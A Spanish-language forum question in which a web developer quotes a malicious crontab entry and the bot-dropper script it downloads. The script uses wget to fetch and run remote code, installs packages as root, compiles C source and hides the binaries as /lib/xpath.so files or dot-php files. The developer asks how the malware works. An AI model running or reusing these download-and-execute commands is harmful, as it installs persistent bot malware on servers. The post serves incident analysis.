Estoy usando un servidor de desarrollo en el que encontré esto en el crontab:
[...]
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
[...]
Los contenidos de http://stablehost.us/bots/regular.bot
son:
#!/bin/sh
if [ $(whoami) = "root" ]; then
echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make
pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2
exit 1
fi
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_
No puedo ponerme en contacto con el administrador del sistema por varias razones, por lo que no puedo preguntarle información sobre esto.
Me parece que este script descarga algunos códigos fuente y binarios de C remotos, los compila y los ejecuta.
Soy un desarrollador web, por lo que no soy un experto en lenguaje C, pero al mirar los archivos descargados me parece un robot inyectado en el cron del servidor.
¿Me puede dar más información sobre lo que hace este código? ¿Sobre su funcionamiento, sus propósitos?
ACTUALIZACIÓN : Así que sabemos, lamentablemente, que es un malware ... Me pregunto: ¿cómo funciona? ¿Me puede dar detalles sobre esto?